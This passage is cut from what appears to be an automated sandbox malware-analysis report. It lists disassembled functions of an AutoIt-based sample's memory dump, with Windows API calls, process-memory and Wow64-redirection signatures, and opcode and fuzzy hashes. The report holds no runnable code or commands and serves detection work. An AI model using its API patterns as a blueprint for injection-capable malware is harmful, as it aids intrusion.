                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                            • Opcode ID: 5f4292fbab5ffc719511d6166647ad6bc21a31d74c6fe0a74af0ee1009ad1f75
                                                                                                                            • Instruction ID: 77cc31e47c3176073c057915606468da48992c1710c3262609bc8135cb768fd3
                                                                                                                            • Opcode Fuzzy Hash: 5f4292fbab5ffc719511d6166647ad6bc21a31d74c6fe0a74af0ee1009ad1f75
                                                                                                                            • Instruction Fuzzy Hash: 8F414176D0111CBFDB10DFA4CC81ADEBBB8EB45310F004199FA55B7191DAB16E85DBA0
                                                                                                                            Function 00F67946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F6F910,00000000,?,?,?,?), ref: 00F679DF
                                                                                                                            • GetWindowLongW.USER32 ref: 00F679FC
                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F67A0C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long
                                                                                                                            • String ID: SysTreeView32
                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                            • Opcode ID: e0f0bb1f8f9b6aff32f922210ea8aab4d1011d8099beeb4c95300dddcbfaa1c6
                                                                                                                            • Instruction ID: 8455ed8cd7a6f56df6f945d5c80eeaeb67f9bef6c13b1bddb3bde983fae10859
                                                                                                                            • Opcode Fuzzy Hash: e0f0bb1f8f9b6aff32f922210ea8aab4d1011d8099beeb4c95300dddcbfaa1c6
                                                                                                                            • Instruction Fuzzy Hash: 4B31DE3260420AABDB119E78DC41BEA77A9EB05338F244725F875A32E0D735ED50AB50
                                                                                                                            Function 00F673D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F67461
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F67475
                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F67499
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window
                                                                                                                            • String ID: SysMonthCal32
                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                            • Opcode ID: 5be3a91086892a34f75e845c114181c6143b68781b309f3478451180c6f224ed
                                                                                                                            • Instruction ID: f4cd34a47a2e6458ae176c0c1056aee620e7048771310644a643d03673c5b66d
                                                                                                                            • Opcode Fuzzy Hash: 5be3a91086892a34f75e845c114181c6143b68781b309f3478451180c6f224ed
                                                                                                                            • Instruction Fuzzy Hash: 7921A132504218BBDF11DF64CC46FEA3B69EF48728F110214FE156B1D0DAB5AC95EBA0
                                                                                                                            Function 00F67B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F67C4A
                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F67C58
                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F67C5F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                            • String ID: msctls_updown32
                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                            • Opcode ID: 61baf2ddee4c5f8a5e465e80b830291f842197f24259bf7ece689879cdac56a7
                                                                                                                            • Instruction ID: ad9e3e13cc4b9b60124519f337b9366ece1bd296ef21c07051dda422bb91004b
                                                                                                                            • Opcode Fuzzy Hash: 61baf2ddee4c5f8a5e465e80b830291f842197f24259bf7ece689879cdac56a7
                                                                                                                            • Instruction Fuzzy Hash: 542162B5604208AFEB11EF14DCC1DA737ECEF4A768B140059F9119B3A1CB71EC51AB60
                                                                                                                            Function 00F66CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F66D3B
                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F66D4B
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F66D70
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                            • String ID: Listbox
                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                            • Opcode ID: ccb7b1a8b03bcc5ae9f9154d9d8f2c1aa5fe007c25e278b568f54532452326d7
                                                                                                                            • Instruction ID: 7b0ced376e63de1afa6ed341663f22de40cbc958029973e07518c54a20a130fd
                                                                                                                            • Opcode Fuzzy Hash: ccb7b1a8b03bcc5ae9f9154d9d8f2c1aa5fe007c25e278b568f54532452326d7
                                                                                                                            • Instruction Fuzzy Hash: CF219272A10118BFDF118F54DC45FAB3BBAEF89764F018128F9559B1A0CA719C51ABA0
                                                                                                                            Function 00F6770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F67772
                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F67787
                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F67794
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                            • Opcode ID: 48bf951ef063c4b35592e23beaa0c01629d4b78136b404a45c54b8336886dcdd
                                                                                                                            • Instruction ID: 4b45f664f6792e45ce73752d3ab68435ab090c35cbfe24c36b7095d2224009e5
                                                                                                                            • Opcode Fuzzy Hash: 48bf951ef063c4b35592e23beaa0c01629d4b78136b404a45c54b8336886dcdd
                                                                                                                            • Instruction Fuzzy Hash: E4110A72644309BFEF106F65CC05FD777ADEF89B68F114118F651A6090D672E851EB20
                                                                                                                            Function 00EE4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4B83,?), ref: 00EE4C44
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EE4C56
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                            • API String ID: 2574300362-1355242751
                                                                                                                            • Opcode ID: 594ab8d621418a7c5a42a7a2100f2c1657a6d86fb33a018180000185027d5fae
                                                                                                                            • Instruction ID: 4b307e5aaac8e35da5e91b75fcf694e4644b4b11a4a6b15793ab770181502445
                                                                                                                            • Opcode Fuzzy Hash: 594ab8d621418a7c5a42a7a2100f2c1657a6d86fb33a018180000185027d5fae
                                                                                                                            • Instruction Fuzzy Hash: FED02B70500B17CFE7208F32E808206B3D4AF05388B21C83ED4A1D71A0E7B4C480D710
                                                                                                                            Function 00EE4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4BD0,?,00EE4DEF,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4C11
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EE4C23
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                            • API String ID: 2574300362-3689287502
                                                                                                                            • Opcode ID: 3174f3e9defe903a132f868efed0a5e414511c2749afe180a0ea7033f711de4d
                                                                                                                            • Instruction ID: 7ffe366710a60b22a4ab3c7f8659f890e40e03ae8d8646f73a13bb8fffe11c40
                                                                                                                            • Opcode Fuzzy Hash: 3174f3e9defe903a132f868efed0a5e414511c2749afe180a0ea7033f711de4d
                                                                                                                            • Instruction Fuzzy Hash: 13D0C270500B17CFE7209F71E808206B6D5EF09389B118C3AE491D2290E6B0C480D711
                                                                                                                            Function 00F60DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00F61039), ref: 00F60DF5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F60E07
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                            • API String ID: 2574300362-4033151799
                                                                                                                            • Opcode ID: fc8dc6284367dc514c9f27cd652a086bb26ace75365fd2a6038df1b1f6b24de6
                                                                                                                            • Instruction ID: e3b1617588930a2cba25cb4ee1c902ecdde2640afaf22644212e41ce58e286af
                                                                                                                            • Opcode Fuzzy Hash: fc8dc6284367dc514c9f27cd652a086bb26ace75365fd2a6038df1b1f6b24de6
                                                                                                                            • Instruction Fuzzy Hash: 29D02E30800327CFEB208F78D80828372E4AF113A2F26CC3ED492C2150EBF1D8A0EA00
                                                                                                                            Function 00F590E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F58CF4,?,00F6F910), ref: 00F590EE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F59100
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                            • API String ID: 2574300362-199464113
                                                                                                                            • Opcode ID: 56424c31a248a8a535cba6b1b79939240544361aa46716025a292ed5eb48ed5c
                                                                                                                            • Instruction ID: 0569a87f3389cdb07e8ef550b127e79a31e8d0abd12327a831a75a6df0a8e8f0
                                                                                                                            • Opcode Fuzzy Hash: 56424c31a248a8a535cba6b1b79939240544361aa46716025a292ed5eb48ed5c
                                                                                                                            • Instruction Fuzzy Hash: FBD01234914723CFDB209F31E81850676D4AF06396B11883AD996D6550E7B0C488E691
                                                                                                                            Function 00F21714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LocalTime__swprintf
                                                                                                                            • String ID: %.3d$WIN_XPe
                                                                                                                            • API String ID: 2070861257-2409531811
                                                                                                                            • Opcode ID: 144402b2e4bbad1130fef860c062714c5bad99296670548993244569fe402fb3
                                                                                                                            • Instruction ID: 886fe6eae49c8cf6c504ce6bbf511473300e973662da68c11398bfca53a21019
                                                                                                                            • Opcode Fuzzy Hash: 144402b2e4bbad1130fef860c062714c5bad99296670548993244569fe402fb3
                                                                                                                            • Instruction Fuzzy Hash: 60D0127280812DEACB109B90AC88DF9777CB769301F100462F802A2040E2658799FA2A
                                                                                                                            Function 00F3717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fcd28ed7a5227497791821d0dab9fc95158a798503f5c951c80e22840e54eddf
                                                                                                                            • Instruction ID: a560a1dbad4ac142f03584420734f30c484df1dd048c80af119b6b89f6051ed2
                                                                                                                            • Opcode Fuzzy Hash: fcd28ed7a5227497791821d0dab9fc95158a798503f5c951c80e22840e54eddf
                                                                                                                            • Instruction Fuzzy Hash: 84C170B5A04216EFCB24DF94C884EAEBBB5FF48324F148599E805EB251D730ED41EB90
                                                                                                                            Function 00F5E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F5E0BE
                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F5E101
                                                                                                                              • Part of subcall function 00F5D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F5D7C5
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F5E301
                                                                                                                            • _memmove.LIBCMT ref: 00F5E314
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3659485706-0
                                                                                                                            • Opcode ID: 815eb6db97238fcb0e27a042e4869b6c9218da31eb13f1777f25e710a2e7e2e5
                                                                                                                            • Instruction ID: 968d9a5f2d3427bee6ca63cb10299eb4f9633274c75c8116866100392ceef153
                                                                                                                            • Opcode Fuzzy Hash: 815eb6db97238fcb0e27a042e4869b6c9218da31eb13f1777f25e710a2e7e2e5
                                                                                                                            • Instruction Fuzzy Hash: 17C15B71A083419FC718DF24C480A6ABBE4FF89714F04896DF9999B352D731EA49DB81
                                                                                                                            Function 00F58093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00F580C3
                                                                                                                            • CoUninitialize.OLE32 ref: 00F580CE
                                                                                                                              • Part of subcall function 00F3D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F3D5D4
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F580D9
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F583AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 780911581-0
                                                                                                                            • Opcode ID: f0a32358bff496db3465242bdc27bd637d2c00dfd9af77fb267e5197faf70d06
                                                                                                                            • Instruction ID: d20c3110afbc2bda0364f10af64823253a6c9d88c49fe68bc111371b345d080e
                                                                                                                            • Opcode Fuzzy Hash: f0a32358bff496db3465242bdc27bd637d2c00dfd9af77fb267e5197faf70d06
                                                                                                                            • Instruction Fuzzy Hash: 31A18B756047459FCB04DF25C881B2AB7E4BF89364F044458FA96AB3A2CB34ED09DB86
                                                                                                                            Function 00F37530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F72C7C,?), ref: 00F376EA
                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F72C7C,?), ref: 00F37702
                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00F6FB80,000000FF,?,00000000,00000800,00000000,?,00F72C7C,?), ref: 00F37727
                                                                                                                            • _memcmp.LIBCMT ref: 00F37748
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 314563124-0
                                                                                                                            • Opcode ID: f2b6967970a5582ecf54b3e5e125ad0bb4983d70910ab15f42b19b33e2c934ad
                                                                                                                            • Instruction ID: ae7c90b18d7b669b46c399c1abacff262c6d1938b93998a8eb02df97acade261
                                                                                                                            • Opcode Fuzzy Hash: f2b6967970a5582ecf54b3e5e125ad0bb4983d70910ab15f42b19b33e2c934ad
                                                                                                                            • Instruction Fuzzy Hash: D1811E75A00209EFCB14DFA4C984EEEB7B9FF89325F204558E505AB250DB71AE05DB60
                                                                                                                            Function 00F3687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
